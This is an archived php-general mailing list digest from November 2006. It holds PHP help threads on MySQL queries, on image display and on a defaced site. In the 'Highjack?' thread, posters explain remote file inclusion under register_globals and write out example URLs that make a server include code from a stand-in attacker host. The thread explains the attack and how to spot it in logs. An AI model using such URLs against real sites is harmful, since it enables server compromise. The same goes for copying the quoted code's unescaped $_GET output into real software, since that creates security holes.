php-general Digest 13 Nov 2006 17:56:39 -0000 Issue 4457

2006-11-13 Thread php-general-digest-help 

php-general Digest 13 Nov 2006 17:56:39 - Issue 4457

Topics (messages 244543 through 244560):

one click - two actions?
244543 by: Mel
244545 by: John Meyer

Re: Parsing brackets in text
244544 by: Roman Neuhauser
244547 by: Dotan Cohen
244551 by: Roman Neuhauser

Re: Mysql strategy
244546 by: Dotan Cohen
244558 by: Dotan Cohen

Re: How do you do the ? mark after a filename
244548 by: Ivo F.A.C. Fokkema

server side security
244549 by: H. Dan Phillips

Highjack?
244550 by: tedd
244559 by: Eric Butera
244560 by: bruce

DOM Validation using PHP
244552 by: Raphael Martins

Re: problem with imagestring()
244553 by: Piotr Sulecki

MDB2 : never ending story
244554 by: Alain Roger
244555 by: Paul Scott
244556 by: Alain Roger
244557 by: Paul Scott

Administrivia:

To subscribe to the digest, e-mail:
[EMAIL PROTECTED]

To unsubscribe from the digest, e-mail:
[EMAIL PROTECTED]

To post to the list, e-mail:
php-general@lists.php.net


--
---BeginMessage---
Could someone please help me figure out how to show some description  
(where applicable) at the same time as I show an image, when I click  
on a link, without repeating the entire query?

The image and the description are both in the same table in my database.

I now show the image when I click on the link which is good, but the  
description stays on at all times instead of appearing only when active.


http://www.squareinch.net/single_page.php

This is the code I have for the image area:
/* query 1 from client */
  $query = SELECT * FROM client
where status='active' or status='old'
order by companyName;

  $result = mysql_query($query)
or die (Couldn't execute query);

  while ($aaa = mysql_fetch_array($result,MYSQL_ASSOC))
  { 
  echo span class='navCompany'{$aaa['companyName']}/spanspan  
class='navArrow'   /span\n;


/* query 2 from job */
$query = SELECT * FROM job
WHERE companyId='{$aaa['companyId']}';
$result2 = mysql_query($query)
or die (Couldn't execute query2);

foreach($aaa as $jobType)
{
$bbb = mysql_fetch_array($result2,MYSQL_ASSOC);
			echo span class='navText'a href='single_page.php?art=.$bbb 
['pix'].'{$bbb['jobType']}/a/span\n;

}   
echo br;
}   
?

/div


div class=navbox3?php $image = $_GET['art']; ?
			img src=images/?php print ($image) ?  alt=Portfolio Item  
border=0 width=285 height=285/div



This is the code I have for the description area:

/* query 1 from client */
$query = SELECT * FROM client
where status='active' or status='old'
order by companyName;

$result = mysql_query($query)
or die (Couldn't execute query);

while   ($row = mysql_fetch_array($result,MYSQL_ASSOC))
{   

/* query 2 from job */
$query = SELECT * FROM job
WHERE companyId='{$row['companyId']}';
$result2 = mysql_query($query)
or die (Couldn't execute query2);
$url = mysql_query($result2);

foreach($row as $url)
{
$row = mysql_fetch_array($result2,MYSQL_ASSOC);
if (url={$row['url']})  
		echo span class='navText'a href='{$row['url']}'{$row['web']}/ 
a/span;			

}

echo br;
}
?


---End Message---
---BeginMessage---
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Not to be rude or anything, but if you want to do two things with one
click, wouldn't the javascript list be the place you would want to go?
Mel wrote:
 Could someone please help me figure out how to show some description
 (where applicable) at the same time as I show an image, when I click on
 a link, without repeating the entire query?
 The image and the description are both in the same table in my database.
 
 I now show the image when I click on the link which is good, but the
 description stays on at all times instead of appearing only when active.
 
 http://www.squareinch.net/single_page.php
 
 This is the code I have for the image area:
 /* query 1 from client */
   $query = SELECT * FROM client
 where status='active' or status='old'
 order by companyName;

   $result = mysql_query($query)
 or die (Couldn't execute query);

php-general Digest 14 Nov 2006 06:16:51 -0000 Issue 4458

2006-11-13 Thread php-general-digest-help 

php-general Digest 14 Nov 2006 06:16:51 - Issue 4458

Topics (messages 244561 through 244583):

Re: Highjack?
244561 by: Matt Carlson
244562 by: Rory Browne
244563 by: bruce

Re: How do you do the ? mark after a filename
244564 by: Norbert Ehart

Scrolling text
244565 by: Alain Roger
244566 by: Robert Cummings

Re: one click - two actions?
244567 by: Mel
244569 by: Warren Vail
244571 by: Mel
244577 by: Warren Vail

Problem with PHP 5.2.0
244568 by: bluefx13.gmail.com
244580 by: Kevin Waterson

Re: Mysql strategy
244570 by: David Tulloh
244572 by: Robert Cummings
244578 by: Chris
244579 by: Larry Garfield

Compressing both php and linked css files with ob_gzhandler and htaccess
244573 by: Graham Anderson
244574 by: Jochem Maas
244575 by: Graham Anderson
244576 by: Graham Anderson

Re: server side security
244581 by: Chris
244582 by: Ligaya A. Turmelle

Re: problem with php[4,5] (horde 2/3)
244583 by: Chris

Administrivia:

To subscribe to the digest, e-mail:
[EMAIL PROTECTED]

To unsubscribe from the digest, e-mail:
[EMAIL PROTECTED]

To post to the list, e-mail:
php-general@lists.php.net


--
---BeginMessage---
With register_globals on, the globals super array ($_POST, $_GET, $_REQUEST) 
are automatically populated into variables.  With that in mind
www.example.com/index.php?path=remoteexplot.com/ would then yield 
include('remoteexplit.com/foo');  thus including ANY code they wish.

- Original Message 
From: bruce [EMAIL PROTECTED]
To: Eric Butera [EMAIL PROTECTED]; tedd [EMAIL PROTECTED]
Cc: PHP General List php-general@lists.php.net
Sent: Monday, November 13, 2006 11:55:13 AM
Subject: RE: [PHP] Highjack?

eric...

you say how embarrasing regaring the $path.'foo' i'm curious, why/how is
this simple piece of code exploitable. assuming $path is not something that
comes via the url vars (GET/POST/REQUEST) it shouldn't be able to be touched
by external/client processes... similarly, the 'foo' would be static, and
couldn't be munged...

thoughts/explanations...

thanks



-Original Message-
From: Eric Butera [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 9:39 AM
To: tedd
Cc: PHP General List
Subject: Re: [PHP] Highjack?


On 11/13/06, tedd [EMAIL PROTECTED] wrote:
 Hi gang:

 While this is not an obvious php question, it does deal with security
 which is a concern.

 Just this morning had a couple of my sites highjacked. What I found
 was someone had replaced my root level index.php with their own
 index.php. You can see the result at:

 http://xn--u2g.com/index1.php

 It was not a terrible loss nor inconvenience, but I wonder how they
 did it. Any ideas how this was done and suggestions as to how to
 prevent this from happening again?

 Thanks,

 tedd

 --
 ---
 http://sperling.com  http://ancientstones.com  http://earthstones.com

 --
 PHP General Mailing List (http://www.php.net/)
 To unsubscribe, visit: http://www.php.net/unsub.php



Tedd,

I've seen this happen before when someone was able to do a remote code
execution exploit on an old version of a very popular open source
shopping cart project.  I'd say the first thing would be to try and
find any include/require statements that are exploitable.  In the case
I was dealing with, it was a problem with register_globals on and an
include that looked a bit like this include($path .'script.php');.
How embarrassing.

If you have access to your server logs look for urls such as
http://example.com/exploited.php?action=http://evil.example.com/inject.txt.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php




---End Message---
---BeginMessage---

-- Forwarded message --
From: Rory Browne [EMAIL PROTECTED]
Date: Nov 13, 2006 7:12 PM
Subject: Re: [PHP] Highjack?
To: [EMAIL PROTECTED]



On 11/13/06, bruce [EMAIL PROTECTED] wrote:


eric...

you say how embarrasing regaring the $path.'foo' i'm curious, why/how
is
this simple piece of code exploitable. assuming $path is not something
that
comes via the url vars (GET/POST/REQUEST)



If register_globals is enabled, someone could
http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=


The script will then include
http://www.badserver.com/badscript.txt?dummy=script.php


it shouldn't be able to be touched

by external/client processes... similarly, the 'foo' would be static, and
couldn't be munged...

thoughts/explanations...

thanks



-Original Message-
From: Eric Butera [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 9:39 AM
To: tedd
Cc: PHP General List
Subject: Re: [PHP]